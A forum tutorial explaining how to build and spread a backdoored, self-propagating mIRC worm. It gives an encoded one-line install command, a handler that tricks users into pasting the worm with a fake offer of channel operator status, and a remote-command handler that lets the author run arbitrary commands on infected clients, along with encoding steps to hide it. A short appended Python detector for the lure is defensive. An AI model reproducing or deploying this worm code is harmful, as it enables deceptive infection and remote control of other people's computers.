Juggernaut
Member
From: Bucuresti
Registered: 18 years ago
Posts: 116
Tutorial mIRC Self-Propagating Script
First of all, I need to point out that this worm is backdoored. This means that people who are infected by this worm can be controlled by you. Once infected with the worm, they are also infected with the Trojan. Using the Trojan you can control the victim’s PC.
Get Started
It all starts with the next command:
//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC 4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSA kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAk bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvc GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKy AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGN ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc
All of this goes on one line!
Understand the Script
We need to mix these two things:
The Self-Propagating Part
on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }
Here #mab is the channel you want them to join if they're infected with the worm. But since that would not be very stealthy, we have to do it another way: we let it message you. We replace .timer 0 120 .join #mab with .msg mab_ inf, where mab_ is your nickname.
With this your worm has started. It will now spread: it will try to send a private message to some people while ignoring them. Having done that, it will try to send itself to other users and tell them to type the command.
This is the original worm I designed. Now we are going to change some things about it so that the functionality of the Trojan is constructive. We will remove the user mode +R at the end of the script, because it only lets users who are authenticated with the official server bot message the victim. Once the Trojan is implemented that is not the objective, so we will remove it from the worm. After these changes we get the following script, which we have to merge with the Trojan script:
on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }
The Remote Access (control) Part
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Mixed together, they give us the backdoored IRC worm. This means that the worm will spread itself, join a certain channel (here: #mab), and meanwhile wait for you to control it via the Trojan. So you will have the rights to do whatever you want on his/her computer, using mIRC. You actually use the victim’s mIRC to run certain commands. (IRC Trojan) I suggest you visit that webpage and read that tutorial too, so you can also fully use the Trojan part of the worm.
I will now try to give more details about that script, so that you truly understand the worm and can easily modify it and achieve better results. I will mix it.
So basically we want to mix these two “mechanisms”:
on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
Solution:
on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}
In one line:
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }
Here DO SOMETHING is the Trojan’s work and DO SOMETHING ELSE is the worm’s work.
Integrated (Two parts joined together):
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }
Good, this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we first have to write it in a different form: some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The following chars have to be written differently: (){}, Why these chars, and how can I check it?
//echo -a $asc(char here)
If this gives a bad result this means that the char must be written in another way.
Example encoding of “,”:
//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct
Note:
$+ = pasting two strings together
| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)
Note that we don't always have to encode it this way; sometimes this method is not needed.
For finding the numbers you use this:
//echo -a $asc($?)
This will pop up an input box, just fill in the char and you’ll get the number as result.
Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:
on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)
So:
//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)
For finding the $encoded variable we split it up as global variables. The variables are set with
/set %var STRING
So to find it we write the following in mIRC:
//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)
But we don't necessarily need to set it as variables before we encode it, so you can just use the encode line.
We get the following result:
All of this is pasted together on one line!
If you want, you can modify the worm to suit your needs. This is the ‘basic’ IRC worm script. By modifying it you can accomplish things that satisfy your needs.
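Seen from the defender's side, the paste lure in this post has a recognizable shape in channel logs: a /write of a $decode(...,m) blob chained to .load -rs, with a text event handler hidden inside the blob. The Python sketch below is an added example, not part of the original post; the log lines and the inert payload are constructed, and the indicator names are hypothetical.

```python
import base64
import binascii
import re

DECODE_RE = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=\s]+?)\s*,\s*m\s*\)", re.I)
WRITE_RE = re.compile(r"/{1,2}write\s", re.I)
LOAD_RE = re.compile(r"[./]load\s+-rs\b", re.I)
EVENT_RE = re.compile(r"\bon\s+\S+:text:", re.I)        # remote text event
SELF_READ_RE = re.compile(r"\$read\(\s*\$script", re.I)  # script reads itself

def decoded_payloads(line):
    """Return the decoded text of every base64 argument to $decode(...,m)."""
    out = []
    for match in DECODE_RE.finditer(line):
        blob = re.sub(r"\s+", "", match.group(1))  # forums wrap long blobs
        try:
            out.append(base64.b64decode(blob, validate=True).decode("latin-1"))
        except (binascii.Error, ValueError):
            out.append("")  # undecodable, but still a $decode call
    return out

def indicators(line):
    """Name the lure indicators (hypothetical labels) found in one chat line."""
    payloads = decoded_payloads(line)
    found = ["decode-call"] if payloads else []
    if WRITE_RE.search(line) and LOAD_RE.search(line):
        found.append("write-then-load")
    if any(EVENT_RE.search(p) for p in payloads):
        found.append("hidden-text-event")
    if any(SELF_READ_RE.search(p) for p in payloads):
        found.append("reads-own-script")
    return found

def is_paste_lure(line):
    """True when a line asks the reader to write and load an encoded script."""
    hits = indicators(line)
    return "decode-call" in hits and "write-then-load" in hits

# Constructed, inert sample data (not the payload from the post).
INERT = "on *:text:*:#:{ echo -a constructed sample }"
INERT_B64 = base64.b64encode(INERT.encode()).decode()
SAMPLE_LOG = [
    "<alice> anyone know a good mIRC theme?",
    "<bob> //echo -a $decode(aGVsbG8=,m)",
    f"<carol> want ops? paste this-> //write x.mrc $decode({INERT_B64},m) | .load -rs x.mrc",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(is_paste_lure(entry), indicators(entry), entry[:40])
```

Running the same check against mIRC's own log directory or a channel bot's feed shows which nicknames are relaying the lure, which in turn points to the clients that have already loaded the script.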